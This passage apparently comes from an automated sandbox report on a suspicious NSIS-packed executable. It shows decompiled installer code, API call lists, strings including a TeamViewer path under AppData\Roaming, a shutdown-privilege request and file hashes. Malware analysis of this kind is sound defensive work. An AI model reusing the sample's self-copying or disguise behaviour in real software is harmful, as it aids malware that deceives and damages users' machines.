										_push(_t105);
										if( *0x4070f0() == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 =  *0x429400; // 0x0
										if(_t120 == 0) {
											E00405B66(0x429400, "C:\\Users\\engineer\\Desktop");
										}
										E00405B66(0x424000, _v392);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)( *0x423eb0 + 0x120)));
											DeleteFileA(0x41f058);
											if(_v412 != 0 && CopyFileA("C:\\Users\\engineer\\Desktop\\77Etc0bR2v.exe", 0x41f058, 1) != 0) {
												_push(0);
												_push(0x41f058);
												E004058B4();
												E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)( *0x423eb0 + 0x124)));
												_t80 = E004053C6(0x41f058);
												if(_t80 != 0) {
													CloseHandle(_t80);
													_v412 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004058B4();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E0040573A(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405B66(0x429400, _t104);
									E00405B66("C:\\Users\\engineer\\AppData\\Roaming\\TeamViewer", _t104);
									_v404 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								_push("\\Temp");
								_push(_t105);
								L00405B82();
								_t89 = E00403208(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t46 = _t46 + 1;
						__eflags =  *_t46 - 0x20;
					} while ( *_t46 == 0x20);
					goto L5;
				}
				goto L20;
			}




































                                                                                                                        0x00403248
                                                                                                                        0x0040324c
                                                                                                                        0x00403254
                                                                                                                        0x00403256
                                                                                                                        0x0040325b
                                                                                                                        0x00403266
                                                                                                                        0x0040326d
                                                                                                                        0x00403275
                                                                                                                        0x0040327f
                                                                                                                        0x00403295
                                                                                                                        0x004032a5
                                                                                                                        0x004032aa
                                                                                                                        0x004032b0
                                                                                                                        0x004032b7
                                                                                                                        0x004032ca
                                                                                                                        0x004032cf
                                                                                                                        0x004032d1
                                                                                                                        0x004032d3
                                                                                                                        0x004032d8
                                                                                                                        0x004032d8
                                                                                                                        0x004032e8
                                                                                                                        0x004032ee
                                                                                                                        0x00403357
                                                                                                                        0x00403357
                                                                                                                        0x00403359
                                                                                                                        0x0040335b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004032f4
                                                                                                                        0x004032f7
                                                                                                                        0x004032ff
                                                                                                                        0x004032ff
                                                                                                                        0x00403302
                                                                                                                        0x00403307
                                                                                                                        0x00403309
                                                                                                                        0x00403309
                                                                                                                        0x0040330a
                                                                                                                        0x0040330a
                                                                                                                        0x0040330f
                                                                                                                        0x00403312
                                                                                                                        0x00403347
                                                                                                                        0x0040334c
                                                                                                                        0x00403351
                                                                                                                        0x00403354
                                                                                                                        0x00403356
                                                                                                                        0x00403356
                                                                                                                        0x00403356
                                                                                                                        0x00000000
                                                                                                                        0x00403314
                                                                                                                        0x00403314
                                                                                                                        0x00403315
                                                                                                                        0x00403318
                                                                                                                        0x00403320
                                                                                                                        0x00403323
                                                                                                                        0x00403325
                                                                                                                        0x00403325
                                                                                                                        0x00403325
                                                                                                                        0x00403323
                                                                                                                        0x00403328
                                                                                                                        0x0040332e
                                                                                                                        0x00403336
                                                                                                                        0x00403339
                                                                                                                        0x0040333b
                                                                                                                        0x0040333b
                                                                                                                        0x0040333b
                                                                                                                        0x00403339
                                                                                                                        0x0040333e
                                                                                                                        0x00403345
                                                                                                                        0x0040335f
                                                                                                                        0x00403362
                                                                                                                        0x0040336b
                                                                                                                        0x00403370
                                                                                                                        0x00403370
                                                                                                                        0x0040337b
                                                                                                                        0x00403381
                                                                                                                        0x00403386
                                                                                                                        0x00403388
                                                                                                                        0x004033aa
                                                                                                                        0x004033af
                                                                                                                        0x004033b6
                                                                                                                        0x004033bd
                                                                                                                        0x004033c1
                                                                                                                        0x00403428
                                                                                                                        0x00403428
                                                                                                                        0x0040342d
                                                                                                                        0x00403437
                                                                                                                        0x00403522
                                                                                                                        0x00403528
                                                                                                                        0x00403533
                                                                                                                        0x0040353c
                                                                                                                        0x0040353e
                                                                                                                        0x00403543
                                                                                                                        0x00403545
                                                                                                                        0x00403547
                                                                                                                        0x00403549
                                                                                                                        0x0040354b
                                                                                                                        0x0040354d
                                                                                                                        0x0040354f
                                                                                                                        0x0040355f
                                                                                                                        0x00403561
                                                                                                                        0x00403563
                                                                                                                        0x00403570
                                                                                                                        0x0040357f
                                                                                                                        0x00403587
                                                                                                                        0x0040358f
                                                                                                                        0x0040358f
                                                                                                                        0x00403563
                                                                                                                        0x0040354f
                                                                                                                        0x0040354b
                                                                                                                        0x00403594
                                                                                                                        0x0040359a
                                                                                                                        0x0040359c
                                                                                                                        0x004035a0
                                                                                                                        0x004035a0
                                                                                                                        0x0040359c
                                                                                                                        0x004035a5
                                                                                                                        0x004035aa
                                                                                                                        0x004035ad
                                                                                                                        0x004035af
                                                                                                                        0x004035af
                                                                                                                        0x004035b7
                                                                                                                        0x004035b7
                                                                                                                        0x00403446
                                                                                                                        0x0040344d
                                                                                                                        0x0040344d
                                                                                                                        0x004033c9
                                                                                                                        0x00403418
                                                                                                                        0x00403418
                                                                                                                        0x00403424
                                                                                                                        0x00000000
                                                                                                                        0x00403424
                                                                                                                        0x004033d2
                                                                                                                        0x004033df
                                                                                                                        0x004033d6
                                                                                                                        0x004033dc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004033de
                                                                                                                        0x004033de
                                                                                                                        0x004033de
                                                                                                                        0x004033e3
                                                                                                                        0x004033e5
                                                                                                                        0x004033ed
                                                                                                                        0x00403453
                                                                                                                        0x00403458
                                                                                                                        0x00403459
                                                                                                                        0x00403463
                                                                                                                        0x00403464
                                                                                                                        0x0040346d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403471
                                                                                                                        0x00403478
                                                                                                                        0x0040347e
                                                                                                                        0x00403484
                                                                                                                        0x0040348c
                                                                                                                        0x0040348c
                                                                                                                        0x0040349a
                                                                                                                        0x004034a1
                                                                                                                        0x004034aa
                                                                                                                        0x004034b0
                                                                                                                        0x004034bc
                                                                                                                        0x004034c2
                                                                                                                        0x004034cc
                                                                                                                        0x004034e0
                                                                                                                        0x004034e1
                                                                                                                        0x004034e2
                                                                                                                        0x004034f3
                                                                                                                        0x004034f9
                                                                                                                        0x00403500
                                                                                                                        0x00403503
                                                                                                                        0x00403509
                                                                                                                        0x00403509
                                                                                                                        0x00403500
                                                                                                                        0x0040350d
                                                                                                                        0x00403513
                                                                                                                        0x00403513
                                                                                                                        0x00403516
                                                                                                                        0x00403517
                                                                                                                        0x00403518
                                                                                                                        0x00000000
                                                                                                                        0x00403518
                                                                                                                        0x004033ef
                                                                                                                        0x004033f1
                                                                                                                        0x004033fc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403404
                                                                                                                        0x0040340f
                                                                                                                        0x00403414
                                                                                                                        0x00000000
                                                                                                                        0x00403414
                                                                                                                        0x00403390
                                                                                                                        0x00403396
                                                                                                                        0x0040339b
                                                                                                                        0x0040339c
                                                                                                                        0x004033a1
                                                                                                                        0x004033a6
                                                                                                                        0x004033a8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004033a8
                                                                                                                        0x00000000
                                                                                                                        0x00403345
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004032f9
                                                                                                                        0x004032f9
                                                                                                                        0x004032f9
                                                                                                                        0x004032fa
                                                                                                                        0x004032fa
                                                                                                                        0x00000000
                                                                                                                        0x004032f9
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • 7414E7F0.COMCTL32 ref: 0040325B
                                                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 00403266
                                                                                                                        • OleInitialize.OLE32(00000000), ref: 0040326D
                                                                                                                          • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                                          • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                                          • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                                        • SHGetFileInfo.SHELL32(0041F458,00000000,?,00000160,00000000), ref: 00403295
                                                                                                                          • Part of subcall function 00405B66: lstrcpyn.KERNEL32(?,?,00000400,004032AA,004236A0,NSIS Error), ref: 00405B73
                                                                                                                        • GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 004032AA
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,00000000), ref: 004032BD
                                                                                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,00000020), ref: 004032E8
                                                                                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040337B
                                                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403390
                                                                                                                        • lstrcat.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040339C
                                                                                                                        • DeleteFileA.KERNELBASE(1033), ref: 004033AF
                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 00403428
                                                                                                                        • OleUninitialize.OLE32(00000000), ref: 0040342D
                                                                                                                        • ExitProcess.KERNEL32 ref: 0040344D
                                                                                                                        • lstrcat.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp), ref: 00403459
                                                                                                                        • lstrcmpi.KERNEL32 ref: 00403465
                                                                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403471
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403478
                                                                                                                        • DeleteFileA.KERNEL32(0041F058,0041F058,?,00424000,?), ref: 004034C2
                                                                                                                        • CopyFileA.KERNEL32(C:\Users\user\Desktop\77Etc0bR2v.exe,0041F058,00000001), ref: 004034D6
                                                                                                                        • CloseHandle.KERNEL32(00000000,0041F058,0041F058,?,0041F058,00000000), ref: 00403503
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403558
                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403594
                                                                                                                        • ExitProcess.KERNEL32 ref: 004035B7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitFileProcess$DirectoryHandle$CurrentDeleteModuleWindowslstrcat$7414AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                        • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\77Etc0bR2v.exe" $1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\TeamViewer$C:\Users\user\Desktop$C:\Users\user\Desktop\77Etc0bR2v.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                        • API String ID: 2012079721-949403541
                                                                                                                        • Opcode ID: 95b2644de8016f8df3482d777034fb250a64d332808757e83748c09c41b177fd
                                                                                                                        • Instruction ID: d9df3101e86bd055252ea398e1a167ecdf9755d8b7b18b8fa076e16bcd865dbe
                                                                                                                        • Opcode Fuzzy Hash: 95b2644de8016f8df3482d777034fb250a64d332808757e83748c09c41b177fd
                                                                                                                        • Instruction Fuzzy Hash: E191D231A087417EE7216F609D49B2B7EACEB01306F44457BF941B61E2C77CAE058B6E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405B88, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 79%
                                                                                                                        			E00405B88(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				char _t45;
				char _t46;
				char _t48;
				int _t49;
				char _t51;
				void* _t59;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				char _t79;
				void* _t81;
				CHAR* _t82;
				void* _t84;
				signed int _t91;
				signed int _t93;
				void* _t94;

				_t84 = __esi;
				_t81 = __edi;
				_t59 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42367c - 4 + _t36 * 4);
				}
				_t70 =  *0x423ed8 + _t36;
				_t37 = 0x422e40;
				_push(_t59);
				_push(_t84);
				_push(_t81);
				_t82 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t82 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t79 =  *_t70;
					if(_t79 == 0) {
						break;
					}
					__eflags = _t82 - _t37 - 0x400;
					if(_t82 - _t37 >= 0x400) {
						break;
					}
					_t70 = _t70 + 1;
					__eflags = _t79 - 0xfc;
					_a8 = _t70;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t82 = _t79;
							_t82 =  &(_t82[1]);
							__eflags = _t82;
						} else {
							 *_t82 =  *_t70;
							_t82 =  &(_t82[1]);
							_t70 = _t70 + 1;
						}
						continue;
					}
					_t39 =  *(_t70 + 1);
					_t71 =  *_t70;
					_t91 = (_t39 & 0x0000007f) << 0x00000007 | _t71 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t71 | 0x00000080;
					_t65 = _t71;
					_v24 = _t65;
					__eflags = _t79 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t79 != 0xfe) {
						__eflags = _t79 - 0xfd;
						if(_t79 != 0xfd) {
							__eflags = _t79 - 0xff;
							if(_t79 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t91;
								_t39 = E00405B88(_t65, _t82, _t91, _t82, (_t39 | 0xffffffff) - _t91);
							}
							L41:
							_push(_t82);
							L00405B7C();
							_t70 = _a8;
							_t82 =  &(_t82[_t39]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t91 - 0x1d;
						if(_t91 != 0x1d) {
							__eflags = (_t91 << 0xa) + 0x424000;
							_t39 = E00405B66(_t82, (_t91 << 0xa) + 0x424000);
						} else {
							_t39 = E00405AC4(_t82,  *0x423ea8);
						}
						__eflags = _t91 + 0xffffffeb - 7;
						if(_t91 + 0xffffffeb < 7) {
							L32:
							_t39 = E00405DC8(_t82);
						}
						goto L41;
					}
					_t93 = 2;
					_t45 = GetVersion();
					__eflags = _t45;
					if(_t45 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t93 = 4;
						}
						__eflags = _t65;
						if(_t65 >= 0) {
							__eflags = _t65 - 0x25;
							if(_t65 != 0x25) {
								__eflags = _t65 - 0x24;
								if(_t65 == 0x24) {
									GetWindowsDirectoryA(_t82, 0x400);
									_t93 = 0;
								}
								while(1) {
									__eflags = _t93;
									if(_t93 == 0) {
										goto L29;
									}
									_t46 =  *0x423ea4;
									_t93 = _t93 - 1;
									__eflags = _t46;
									if(_t46 == 0) {
										L25:
										_t48 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t94 + _t93 * 4 - 0x18),  &_v12);
										__eflags = _t48;
										if(_t48 != 0) {
											L27:
											 *_t82 =  *_t82 & 0x00000000;
											__eflags =  *_t82;
											continue;
										}
										_t49 = SHGetPathFromIDList(_v12, _t82);
										 *0x407278(_v12);
										__eflags = _t49;
										if(_t49 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t51 =  *_t46( *0x423ea8,  *(_t94 + _t93 * 4 - 0x18), 0, 0, _t82); // executed
									__eflags = _t51;
									if(_t51 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t82, 0x400);
							goto L29;
						} else {
							_t68 = (_t65 & 0x0000003f) +  *0x423ed8;
							E00405A4D(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t65 & 0x0000003f) +  *0x423ed8, _t82, _t65 & 0x00000040);
							__eflags =  *_t82;
							if( *_t82 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									_push("\\Microsoft\\Internet Explorer\\Quick Launch");
									_push(_t82);
									L00405B82();
								}
								goto L32;
							}
							E00405B88(_t68, _t82, _t93, _t82, _v16);
							L29:
							__eflags =  *_t82;
							if( *_t82 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t45 - 0x5a04;
					if(_t45 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t82 =  *_t82 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405B66(_a4, _t37);
			}




























                                                                                                                        0x00405b88
                                                                                                                        0x00405b88
                                                                                                                        0x00405b88
                                                                                                                        0x00405b8e
                                                                                                                        0x00405b93
                                                                                                                        0x00405ba4
                                                                                                                        0x00405ba4
                                                                                                                        0x00405baf
                                                                                                                        0x00405bb1
                                                                                                                        0x00405bb6
                                                                                                                        0x00405bb9
                                                                                                                        0x00405bba
                                                                                                                        0x00405bc1
                                                                                                                        0x00405bc3
                                                                                                                        0x00405bc9
                                                                                                                        0x00405bcc
                                                                                                                        0x00405bcc
                                                                                                                        0x00405da5
                                                                                                                        0x00405da5
                                                                                                                        0x00405da9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405bd9
                                                                                                                        0x00405bdf
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405be5
                                                                                                                        0x00405be6
                                                                                                                        0x00405be9
                                                                                                                        0x00405bec
                                                                                                                        0x00405d98
                                                                                                                        0x00405da2
                                                                                                                        0x00405da4
                                                                                                                        0x00405da4
                                                                                                                        0x00405d9a
                                                                                                                        0x00405d9c
                                                                                                                        0x00405d9e
                                                                                                                        0x00405d9f
                                                                                                                        0x00405d9f
                                                                                                                        0x00000000
                                                                                                                        0x00405d98
                                                                                                                        0x00405bf2
                                                                                                                        0x00405bf6
                                                                                                                        0x00405c06
                                                                                                                        0x00405c0a
                                                                                                                        0x00405c11
                                                                                                                        0x00405c14
                                                                                                                        0x00405c18
                                                                                                                        0x00405c1e
                                                                                                                        0x00405c21
                                                                                                                        0x00405c24
                                                                                                                        0x00405c27
                                                                                                                        0x00405d42
                                                                                                                        0x00405d45
                                                                                                                        0x00405d75
                                                                                                                        0x00405d78
                                                                                                                        0x00405d7d
                                                                                                                        0x00405d81
                                                                                                                        0x00405d81
                                                                                                                        0x00405d86
                                                                                                                        0x00405d86
                                                                                                                        0x00405d87
                                                                                                                        0x00405d8c
                                                                                                                        0x00405d8f
                                                                                                                        0x00405d91
                                                                                                                        0x00000000
                                                                                                                        0x00405d91
                                                                                                                        0x00405d47
                                                                                                                        0x00405d4a
                                                                                                                        0x00405d5f
                                                                                                                        0x00405d66
                                                                                                                        0x00405d4c
                                                                                                                        0x00405d53
                                                                                                                        0x00405d53
                                                                                                                        0x00405d6e
                                                                                                                        0x00405d71
                                                                                                                        0x00405d3a
                                                                                                                        0x00405d3b
                                                                                                                        0x00405d3b
                                                                                                                        0x00000000
                                                                                                                        0x00405d71
                                                                                                                        0x00405c2f
                                                                                                                        0x00405c30
                                                                                                                        0x00405c36
                                                                                                                        0x00405c38
                                                                                                                        0x00405c52
                                                                                                                        0x00405c52
                                                                                                                        0x00405c59
                                                                                                                        0x00405c59
                                                                                                                        0x00405c60
                                                                                                                        0x00405c64
                                                                                                                        0x00405c64
                                                                                                                        0x00405c65
                                                                                                                        0x00405c67
                                                                                                                        0x00405ca0
                                                                                                                        0x00405ca3
                                                                                                                        0x00405cb3
                                                                                                                        0x00405cb6
                                                                                                                        0x00405cbe
                                                                                                                        0x00405cc4
                                                                                                                        0x00405cc4
                                                                                                                        0x00405d20
                                                                                                                        0x00405d20
                                                                                                                        0x00405d22
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405cc8
                                                                                                                        0x00405ccf
                                                                                                                        0x00405cd0
                                                                                                                        0x00405cd2
                                                                                                                        0x00405cec
                                                                                                                        0x00405cfa
                                                                                                                        0x00405d00
                                                                                                                        0x00405d02
                                                                                                                        0x00405d1d
                                                                                                                        0x00405d1d
                                                                                                                        0x00405d1d
                                                                                                                        0x00000000
                                                                                                                        0x00405d1d
                                                                                                                        0x00405d08
                                                                                                                        0x00405d13
                                                                                                                        0x00405d19
                                                                                                                        0x00405d1b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405d1b
                                                                                                                        0x00405cd4
                                                                                                                        0x00405cd7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405ce6
                                                                                                                        0x00405ce8
                                                                                                                        0x00405cea
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405cea
                                                                                                                        0x00000000
                                                                                                                        0x00405d20
                                                                                                                        0x00405cab
                                                                                                                        0x00000000
                                                                                                                        0x00405c69
                                                                                                                        0x00405c6e
                                                                                                                        0x00405c84
                                                                                                                        0x00405c89
                                                                                                                        0x00405c8c
                                                                                                                        0x00405d29
                                                                                                                        0x00405d29
                                                                                                                        0x00405d2d
                                                                                                                        0x00405d2f
                                                                                                                        0x00405d34
                                                                                                                        0x00405d35
                                                                                                                        0x00405d35
                                                                                                                        0x00000000
                                                                                                                        0x00405d2d
                                                                                                                        0x00405c96
                                                                                                                        0x00405d24
                                                                                                                        0x00405d24
                                                                                                                        0x00405d27
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405d27
                                                                                                                        0x00405c67
                                                                                                                        0x00405c3a
                                                                                                                        0x00405c3e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405c40
                                                                                                                        0x00405c44
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405c46
                                                                                                                        0x00405c4a
                                                                                                                        0x00000000
                                                                                                                        0x00405c4c
                                                                                                                        0x00405c4c
                                                                                                                        0x00000000
                                                                                                                        0x00405c4c
                                                                                                                        0x00405c4a
                                                                                                                        0x00405daf
                                                                                                                        0x00405db9
                                                                                                                        0x00405dc5
                                                                                                                        0x00405dc5
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • GetVersion.KERNEL32(?,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405C30
                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00405CAB
                                                                                                                        • GetWindowsDirectoryA.KERNEL32( "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe",00000400), ref: 00405CBE
                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405CFA
                                                                                                                        • SHGetPathFromIDList.SHELL32(00000000, "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe"), ref: 00405D08
                                                                                                                        • 762AA680.OLE32(00000000), ref: 00405D13
                                                                                                                        • lstrcat.KERNEL32( "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe",\Microsoft\Internet Explorer\Quick Launch), ref: 00405D35
                                                                                                                        • lstrlen.KERNEL32( "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe",?,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405D87
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$A680FolderFromListLocationPathSpecialSystemVersionWindowslstrcatlstrlen
                                                                                                                        • String ID: "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe"$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                        • API String ID: 2738003839-1842425495
                                                                                                                        • Opcode ID: 0a1c1a305b72793dfb894d14277ea09d9f1e9f2aa1aa99d6d5a3f05fa8915784
                                                                                                                        • Instruction ID: 2bb53c71d9fe9ef1e56bc14ab20fd8486271744d1d3ead2cb2ad614034e11287
                                                                                                                        • Opcode Fuzzy Hash: 0a1c1a305b72793dfb894d14277ea09d9f1e9f2aa1aa99d6d5a3f05fa8915784
                                                                                                                        • Instruction Fuzzy Hash: D7510131A04A04AAEF205F64DC88B7B3BA4DF55324F14823BE911B62D0D33C59829E4E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406131, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E00406131() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
